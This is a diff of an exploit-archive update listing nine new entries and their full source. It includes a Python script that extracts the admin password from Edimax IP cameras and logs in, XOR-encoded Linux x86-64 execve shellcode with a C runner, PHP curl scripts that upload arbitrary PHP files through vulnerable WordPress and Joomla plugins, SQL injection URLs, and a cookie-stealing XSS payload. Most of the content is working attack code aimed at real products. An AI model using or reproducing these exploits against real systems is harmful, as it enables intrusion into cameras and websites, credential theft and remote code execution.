DB: 2015-06-29

9 new exploits

files.csv

@@ -33751,5 +33751,14 @@ id,file,description,date,author,platform,type,port
 37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0
 37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0
 37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0
+37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux  64 bit - Encoded execve shellcode",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0
 37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
 37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting Vulnerability",2012-06-17,anonymous,php,webapps,0
+37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn UDP Packet Password Information Disclosure Vulnerability",2012-06-14,y3dips,hardware,remote,0
+37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 'uploadfilexd.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
+37407,platforms/php/webapps/37407.txt,"ADICO 'index.php' Script SQL Injection Vulnerability",2012-06-15,"Ibrahim El-Sayed",php,webapps,0
+37408,platforms/php/webapps/37408.txt,"Simple Forum PHP Multiple SQL Injection Vulnerabilities",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0
+37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal SQL Injection Vulnerabilities",2012-06-14,"Ibrahim El-Sayed",php,webapps,0
+37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' Arbitrary File Upload Vulnerability",2012-06-17,"Sammy FORGIT",php,webapps,0
+37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
+37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-16,"Sammy FORGIT",php,webapps,0

platforms/hardware/remote/37405.py

@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/54006/info
+
+Edimax IC-3030iWn is prone to an information-disclosure vulnerability.
+
+Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. 
+
+#!/usr/bin/env python
+"""
+# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
+# Date: 4 April 2012
+# Exploit Author: y3dips@echo.or.id, @y3dips
+# URL: http://echo.or.id
+# Vendor Homepage: http://www.edimax.com
+# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
+# Also Tested on:
+   - Edimax IC-3015
+   - Airlive WN 500
+# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
+# To successfully automate your browser launch, change browser path.
+"""
+
+import socket
+import webbrowser
+import sys
+
+if len(sys.argv) != 2:
+    print "Eg: ./edimaxpwned.py edimax-IP"
+    sys.exit(1)
+
+port=13364
+target= sys.argv[1]
+
+
+def read_pw(target, port):
+    devmac = "\xff\xff\xff\xff\xff\xff"
+    code="\x00\x06\xff\xf9" #for unicast reply
+    data=devmac+code
+    sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+    sock.connect((target,port))
+    try:
+        sock.send(data)
+        sock.settimeout(5)
+        tmp = sock.recv(4096)
+        return tmp
+    except socket.timeout:
+        return None
+
+def pwned_edi():
+    data=read_pw(target, port)
+    if data != None:
+        data=data[365:377]
+        pw=data.strip("\x00")
+        webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
+    else:
+        print "Socket timeOut or not Vulnerable"
+
+pwned_edi()

platforms/lin_x86-64/shellcode/37401.asm

@@ -0,0 +1,40 @@
+/*
+Compile with: gcc -fno-stack-protector -z execstack
+This execve shellcode is encoded with 0xff and is for 64 bit linux.
+
+shell:     file format elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000400080 <start>:
+  400080:	48 b9 ff ff ff ff ff 	movabs rcx,0xffffffffffffffff
+  400087:	ff ff ff 
+  40008a:	49 b8 ae b7 72 c3 db 	movabs r8,0xfffaf0dbc372b7ae
+  400091:	f0 fa ff 
+  400094:	49 31 c8             	xor    r8,rcx
+  400097:	41 50                	push   r8
+  400099:	49 b8 d0 9d 96 91 d0 	movabs r8,0x978cd0d091969dd0
+  4000a0:	d0 8c 97 
+  4000a3:	49 31 c8             	xor    r8,rcx
+  4000a6:	41 50                	push   r8
+  4000a8:	49 b8 b7 ce 2d ad 4f 	movabs r8,0x46b7c44fad2dceb7
+  4000af:	c4 b7 46 
+  4000b2:	49 31 c8             	xor    r8,rcx
+  4000b5:	41 50                	push   r8
+  4000b7:	ff e4                	jmp    rsp
+
+2015 William Borskey
+
+*/
+char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
+
+int main(int argc, char **argv)
+{
+    int (*func)();
+    func = (int (*)()) shellcode;
+    (int)(*func)();
+     return 0;
+}
+
+

platforms/php/webapps/37406.php

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/54020/info
+
+Zingiri Web Shop plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Zingiri Web Shop 2.4.3 is vulnerable; other versions may also be affected.
+
+<?php
+
+$uploadfile="lo.php";
+ 
+$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/&action=save");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('fh'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?> 
+

platforms/php/webapps/37407.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54023/info
+
+ADICO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ADICO 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION]
+
+http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION] 

platforms/php/webapps/37408.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/54024/info
+
+Simple Forum PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Simple Forum PHP 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cms/forum.php?p=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum.php?orderType=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum.php?orderType=[ASC/DESC]&orderBy=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum/admin.php?act=topics&orderType=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum/admin.php?act=topics&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=-1 [SQL-INJECTION]--
+http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]-- 

platforms/php/webapps/37409.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54026/info
+
+NetArt Media Jobs Portal is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
+
+NetArt Media Jobs Portal 3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]-- 

platforms/php/webapps/37410.php

@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/54037/info
+
+The hwdVideoShare component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+hwdVideoShare r805 is vulnerable; other versions may also be affected. 
+
+
+<?php
+
+$uploadfile="lo.php.vob";
+
+$ch = 
+curl_init("http://www.example.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+                array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+echo "<br />";
+
+     $i = 0;
+     for ($i=1;$i<9999;$i++)
+     {
+         $n = 4;
+         $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT);
+         $filename = date('YmdH').$num.$uploadfile;
+         $url = "http://www.exemple.com/tmp/".$filename;
+         $c = curl_init("$url");
+         $postResult2 = curl_exec($c);
+         $info = curl_getinfo($c);
+             $httpcode = $info['http_code'];
+                 if($httpcode == 200){
+                     echo $url;
+                     curl_close($c);
+                     exit;
+                 }
+     }
+?>

platforms/php/webapps/37411.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/54039/info
+
+The Organizer plugin for WordPress is prone to the following security vulnerabilities:
+
+1. A cross-site scripting vulnerability.
+2. An information-disclosure vulnerability.
+3. A directory-traversal vulnerability.
+
+Attackers may leverage these issues to steal cookie-based authentication credentials, execute arbitrary script code in the browser, or disclose sensitive information; other attacks are also possible.
+
+Organizer 1.2.1 is vulnerable; other versions may also be affected. 
+
+Directory-traversal vulnerability:
+
+http://www.example.com/wp-admin/wp-admin/admin.php?page=organizer/page/view.php
+
+Cross-site scripting vulnerability:
+
+http://www.example.com/wp-admin/admin.php?page=organizer/page/dir.php
+"><script>alert(document.cookie)</script>
+
+Information-disclosure vulnerability:
+
+http://www.example.com/wp-admin/admin.php?page=organizer/page/users.php
+

platforms/php/webapps/37412.php

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/54041/info
+
+The Maian Media component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 
+
+<?php
+
+$headers = array("Content-Type: application/octet-stream");
+$uploadfile="<?php phpinfo(); ?>";
+$ch = 
+curl_init("http://www.example.com/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>